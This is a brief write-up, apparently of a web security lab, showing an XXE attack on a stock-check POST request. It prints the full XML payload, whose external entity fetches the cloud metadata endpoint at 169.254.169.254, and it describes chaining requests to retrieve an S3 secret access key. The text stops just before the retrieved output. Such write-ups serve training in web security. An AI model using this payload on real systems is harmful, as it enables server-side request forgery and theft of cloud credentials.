We first identified the POST request that was passing data in XML format:
We then used the following payload to access the internal URL:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [
<!ENTITY xxe SYSTEM "http://169.254.169.254/">
]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>After sending the request, we were able to observe the server’s response, which included a directory name from the metadata endpoint.
We continued by editing the payload and appending the URL parameter based on the response we received.
Upon accessing the final endpoint, we successfully retrieved the secret access key of the associated S3 bucket:
